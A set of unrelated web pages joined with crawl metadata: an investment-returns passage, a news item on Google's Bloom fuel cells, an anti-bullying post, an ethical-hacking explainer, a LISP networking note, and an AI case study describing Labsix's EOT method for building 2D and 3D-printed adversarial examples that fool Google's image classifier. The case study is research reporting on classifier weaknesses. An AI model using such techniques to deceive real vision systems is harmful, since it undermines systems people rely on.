protecting investors from the negative impact of inflation. The tangible nature of real estate assets makes them an attractive option for diversifying investment portfolios, helping to reduce overall risk exposure. By capitalizing on the advantages of generating income and the potential for price appreciation, real estate has solidified its position as a dependable long-term investment choice for individuals seeking stable returns in the face of market fluctuations. Commodities, such as natural resources like gold and oil, have historically demonstrated significant market volatility while providing protection across various economic cycles. Raw materials serve as a hedge against inflation, as their worth typically rises when currency values fall. Throughout the annals of finance, commodities have played a pivotal role in diversifying investment portfolios and mitigating overall risk. Investors often look to commodities to stabilize their investments, particularly in times of economic instability. Although the prices of commodities can fluctuate, they can serve as a valuable tool in offsetting the effects of economic downturns when strategically integrated into a comprehensive investment plan. Cash and Cash Equivalents You rely on cash and cash equivalents as highly liquid assets that deliver stability and immediate access to funds, even though they typically yield lower returns in comparison to other asset classes. These short-term investments play a vital role in a diversified investment portfolio due to their capacity to swiftly convert into cash without significant loss of value. Investors appreciate the predictability and stability that cash and cash equivalents contribute to their overall financial position. Historically, cash and cash equivalents have retained their value during economic downturns, positioning them as a dependable choice for capital preservation. Their liquidity makes them well-suited for covering any unforeseen expenses that may emerge in the short term. Factors Affecting Historical Investment Returns Various factors, including risk, diversification, market volatility, and economic cycles, play a significant role in historical investment returns and can impact future performance significantly. Understanding these dynamics is essential for investors aiming to navigate the complexities of financial markets successfully. Risks, such as market volatility, can result in fluctuations in returns, while diversification strategies are designed to distribute risk across multiple asset classes to minimize potential losses. Economic cycles can determine the overall market health and influence investment returns in diverse ways. By thoroughly analyzing these factors and adjusting investment strategies accordingly, investors can position themselves for more stable and potentially lucrative outcomes over the long term. How to Use Historical Investment Returns for Future Investments By leveraging historical investment returns, you can effectively steer your future investments in the right direction. This practice will enable you to comprehend potential risks and returns, establish achievable investment objectives, and develop a comprehensive long-term investment strategy that aligns with your financial planning goals. Through the analysis of past performance data, investors like yourself can acquire valuable insights into market trends and patterns. These insights are instrumental in forecasting future investment prospects. Understanding these patterns enables you to refine your investment approach, seizing potential opportunities while mitigating risks. Tailoring your portfolio to align with particular financial goals, whether they are focused on short-term gains or long-term wealth preservation, can be achieved by considering various investment horizons.
<urn:uuid:eeaa8b74-f11a-4c94-8de4-a7838354d5dc>
CC-MAIN-2024-38
https://bluehillresearch.com/historical-investment-returns-by-asset-class/
2024-09-11T10:59:04Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651383.5/warc/CC-MAIN-20240911084051-20240911114051-00571.warc.gz
en
0.936478
1,586
2.671875
3
Google Using Bloom Box, But Not in Data Center Google (GOOG) was the first customer for Bloom Energy, and is using the startup's gas-powered fuel cells in its operations. But contrary to early media reports, it is not using any of the "Bloom Boxes" in its data centers at present. February 22, 2010 Google was the first customer for Bloom Energy, and is using the startup's gas-powered fuel cells in its operations. But is Google using the "Bloom Box" units in one of its data centers? 60 Minutes reported Sunday that Google has been using four Bloom Boxes to power one of its data centers for the last 18 months. It turns out that's not quite correct. "These fuel cells aren't powering any off-site data centers," said a Google spokesperson. "Instead, Bloom fuel cells are powering a portion of Google's energy needs at our headquarters right here in Mountain View. This is another on-site renewable energy source that we're exploring to help power our facilities. We have a 400kW installation on Google’s main campus. Over the first 18 months the project has had 98% availability and delivered 3.8 million kWh of electricity." The Bloom Energy units run on methane or other hydrocarbons. The machine produces electricity, as well as some heat, carbon dioxide and water. While 400 kilowatts is a lot of power for some commercial buildings, it's a fraction of what would be needed for a major data center. The same goes for the 98 percent availability, as data centers typically shoot for at least "four nines" (99.99 percent uptime) and beyond. Despite those issues, there are a number of data center projects that have incorporated fuel cells using natural gas or biogas. Some previous examples: T-Systems is using a “hot module” fuel cell to provide power for a server room in a facility in Munich, Germany, which runs on biogas supplied by a planet in nearby Pliening. Fujitsu has used a fuel cell in its Sunnyvale data center. The fuel cell produce 200 kilowatts of power, which is enough to power half of the cooling needed in Fujitsu's data center. A Syracuse University data center is susing gas-powered microturbines, which generate electricity, while the hot exhaust is piped to the chiller room, where it is used to generate cooling for the servers and both heat and cooling for an adjacent office building. Verizon has been using fuel cell technology to power one of its facilities in Garden City, N.Y., on Long Island. Seven fuel cells generate power for a 292,000-square-foot facility that provides telephone and data services to some 35,000 customers on Long Island The primary barrier to use of fuel cells in data centers has been the up-front cost of the units. 60 Minutes reports that each Bloom unit costs $700,000 to $800,000. Venture capitalist John Doerr of Kleiner Perkins Caufield & Byers, one of Bloom Energy's backers, said the Bloom Box is intended to replace the grid for its customers. "It's cheaper than the grid, (and) it's cleaner than the grid," Doerr told 60 Minutes. We'll no doubt hear more in a Wednesday press conference to officially launch Bloom Energy. Read more about: Google AlphabetAbout the Author You May Also Like
<urn:uuid:35c3b301-6c1a-488a-aad0-02cb6af99785>
CC-MAIN-2024-38
https://www.datacenterknowledge.com/hyperscalers/google-using-bloom-box-but-not-in-data-center
2024-09-16T10:24:00Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651682.69/warc/CC-MAIN-20240916080220-20240916110220-00171.warc.gz
en
0.946889
710
2.75
3
Natasha Alam from True Blood has joined the growing list of celebrities speaking out publicly against bullying. Celebrities are raising awareness and bringing attention to this escalating challenge. Alam recently filmed an anti-bullying public service announcement (PSA), click here to learn more. Canada recently targeted bullying with their National Bullying Awareness Week and the UK recently promoted the Big March to bring attention to bullying, violence and harassment in schools. Each of these efforts encourages people to speak out about bullying and victimization, and adults are being urged to listen. These campaigns also mention prevention, the need for awareness and how everyone (students, parents, teachers, staff, community members, etc.) can play a role and make a difference. I agree that PREVENTION is critical, and I agree we need to help victims be heard and encourage Security Teams and Prevention Teams to listen. Unfortunately, traditional ‘safe school’ approaches are not delivering the results we need. The statistics are real; the challenges victims face and the suicides are real, and it is clear that the time is now for new approaches. The PSAs, marches and awareness weeks are all great first steps. However, bullying is a systemic problem that needs comprehensive tools and solutions to deliver multi-directional awareness, accountability, auditability and measurability. How is your school measuring your efforts? Are administrators measuring incident reports and tips provided by victims and bystanders? Are you measuring if school leaders and communities are listening? Are you measuring if prevention and intervention efforts are working or not working on an ongoing basis? Are you measuring if your efforts are meeting the OCR Dear Colleague letter’s guidelines? Awareity wants to know… How is your school addressing bullying? Do you have a new innovative approach?
<urn:uuid:eb255199-b1a6-41a4-b25d-c0a43131bb62>
CC-MAIN-2024-38
https://www.awareity.com/2010/12/01/bullying-psasok-then-what/
2024-09-07T23:18:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00071.warc.gz
en
0.962276
363
2.65625
3
AI Case Study Labsix researchers generate images and objects which deceive Google's image classifier successfully 96% and 84% of the time but remain undetectable to humans Researchers develop an algorithm which can trick neural network-based image classifiers into misclassifying images of 2D and 3D objects. The disruptions to the images are undetectable to humans but worked to cause Google's image classifier into miscategorising them 96% of the time for the 2D images and 84% for the 3D objects. Software And It Services Targeting Google's InceptionV3 image classifier, researchers developed a new algorithm "for reliably producing adversarial examples that cause targeted misclassification under transformations like blur, rotation, zoom, or translation, and we use it to generate both 2D printouts and 3D models that fool a standard neural network at any angle. Our process works for arbitrary 3D models. The examples still fool the neural network when we put them in front of semantically relevant backgrounds; for example, you’d never see a rifle underwater, or an espresso in a baseball mitt." (labsix.org) From the arXiv paper: "By introducing EOT, a general-purpose algorithm for the creation of robust examples under any chosen distribution, and modeling 3D rendering and printing within the framework of EOT, we succeed in fabricating three-dimensional adversarial examples. In particular, with access only to low-cost commercially available 3D printing technology, we successfully print physical adversarial objects that are strongly classified as a desired target class over a variety of angles, viewpoints, and lighting conditions by a standard ImageNet classifier." Labsix.org: "Our work demonstrates that adversarial examples are a significantly larger problem in real world systems than previously thought." The generated 2D images were 96.4% adversarial, while the 3D models had "an average adversariality of 84.0% with a long left tail, showing that EOT usually produces highly adversarial objects". For the photos of the 3D printed objects, the adversarial percentage was 82% for the turtle and 59% for the baseball. "We produce 3D adversarial examples by modeling the 3D rendering as a transformation under EOT [the algorithm]. Given a textured 3D object, we optimize over the texture such that the rendering is adversarial from any viewpoint. We consider a distribution that incorporates different camera distances, lateral translation, rotation of the object, and solid background colors. We consider 5 complex 3D models, choose 20 random target classes per model, and use EOT to synthesize adversarial textures for the models with minimal parameter search". For the physical object test: "We choose target classes for each of the models at random — “rifle” for the turtle, and “espresso” for the baseball — and we use EOT to synthesize adversarial examples. We evaluate the performance of our two 3D-printed adversarial objects by taking 100 photos of each object over a variety of viewpoints." (arXiv paper) From labsix's websiteL "Neural network based classifiers reach near-human performance in many tasks, and they’re used in high risk, real world systems. Yet, these same neural networks are particularly vulnerable to adversarial examples, carefully perturbed inputs that cause targeted misclassification." However, as the researchers state in their arXiv paper, "The existence of adversarial examples for neural networks has until now been largely a theoretical concern. While minute, carefully-crafted perturbations can cause targeted misclassification in a neural network, adversarial examples produced using standard techniques lose adversariality when directly translated to the physical world as they are captured over varying viewpoints and affected by natural phenomena such as lighting and camera noise. This phenomenon suggests that practical systems may not be at risk because adversarial examples generated using standard techniques are not robust in the physical world." RGB images of 2D images and 3D models. From the arXiv paper, for the 2D images: "We take the first 1000 images in the ImageNet validation set, randomly choose a target class for each image, and use EOT to synthesize an adversarial example that is robust over the chosen distribution". In the 3D models case: "For each of the 100 adversarial examples, we sample 100 random transformations from the distribution".
<urn:uuid:90c022dc-aad1-4c3a-b1a5-d4e8a8c3ff89>
CC-MAIN-2024-38
https://www.bestpractice.ai/ai-case-study-best-practice/labsix_researchers_generate_images_and_objects_which_deceive_google's_image_classifier_successfully_96%25_and_84%25_of_the_time_but_remain_undetectable_to_humans
2024-09-07T23:52:55Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00071.warc.gz
en
0.901338
909
2.578125
3
Hackers are widely understood to be shady networking experts, coders, and computer professionals with malicious intent towards the online cyberspace. These hackers also called ‘cyber-criminals,’ aim to illegally infiltrate computer systems so that they can get access to precious data. This data includes confidential records, bank account details, imagery, authentication credentials, and all other kinds of sensitive information, which could be monetized. The data is either sold, processed, manipulated, or held for ransom. While a general perception of hacking exists in the broader community, the concept of ethical hacking still seems to be alien to many people. It may have something to do with the negative connotations attached to the word ‘hacking’ itself that the preceding term ‘ethical’ seems contradictory and, consequently, somewhat confusing. Hacking is merely finding the existing loopholes and vulnerabilities in security systems. The path of the hacker that follows this step differentiates the bad guys from the good. The criminals will use their hacking exploits to achieve further access and pursue malicious objectives. Ethical hackers will use their hacking exploits to inform the systems’ owners about the vulnerabilities so that they could be remediated. Another critical difference between the ethical hackers, or ‘white hat’ hackers, and the cybercriminals, is that they seek permission from the owners before infiltrating the systems. In contrast, on the other hand, the entire premise of criminal hacking is to gain access illegally. Why Ethical Hacking is Important The importance of a different perspective is vital for the resilience of security systems. The team behind the system architecture and the security infrastructure can only gauge the system’s strength from their own point of view since they developed it. Many vulnerabilities go unnoticed when checked from a single perspective, making ethical hacking even more crucial for security systems. The white hat hackers can uncover vulnerabilities in the firewalls that were previously unknown by the dev’s, making ethical hacking a necessity for companies since that outside perspective makes all the difference. Moreover, the entire act of letting an ethical hacker attack your information stronghold is a simulation of an actual cybercriminal potentially attempting to penetrate the company defenses. This is why the company provides no information to the ethical hacker, and the hacker must gather Intel on their own, as would any cybercriminal. Companies Want Ethical Hackers Ethical hackers are heavily invited to infiltrate company defenses due to a multitude of reasons. It lets them outsource security scans and then resolve the issues without too much service downtime. The white hat hackers are welcome to work under the vulnerability disclosure policy published by the concerned organization so that way they can supervise the progress of the white hat hackers who are just as skilled as the ‘black hat’ (cybercriminals). Other than issuing the vulnerability disclosure policy, many companies employ bug bounty schemes to incentivize ethical hacking further. Hackers who find, expose, and report the bugs and cracks in company systems to the owners receive substantial financial compensation and sometimes permanent jobs. Usually, added to the threat of being caught by the law, this serves more incentive for black hat hackers to help out organizations instead of attacking them.
<urn:uuid:b1f862a4-15a7-4625-a9cc-2468a6fcb09a>
CC-MAIN-2024-38
https://www.infoguardsecurity.com/ethical-hacking-as-explained-by-white-hat-hackers/
2024-09-07T23:12:58Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00071.warc.gz
en
0.938633
650
3.109375
3
LISP host mobility use cases Locator Identity Separation Protocol (LISP) allows hosts to move from one site to another while maintaining the same assigned IP addresses. There are two fundamental ways in which this can be configured: - LISP Host Mobility with an Extended Subnet - This option involves physically extending the subnet to a different site using OTV, VPLS, or other LAN extension technologies. In this way, when a host moves, it can maintain the same IP address within the same subnet, thus the problem of changing IP addresses is eliminated. - LISP Host Mobility Across Subnets - This solution allows a host to be migrated to a remote IP subnet while retaining its original IP address using a mapping mechanism.
<urn:uuid:f0046975-bb4d-4d0c-97e2-446b0f614e04>
CC-MAIN-2024-38
https://notes.networklessons.com/lisp-host-mobility-use-cases
2024-09-10T08:13:52Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651224.59/warc/CC-MAIN-20240910061537-20240910091537-00771.warc.gz
en
0.896141
155
2.84375
3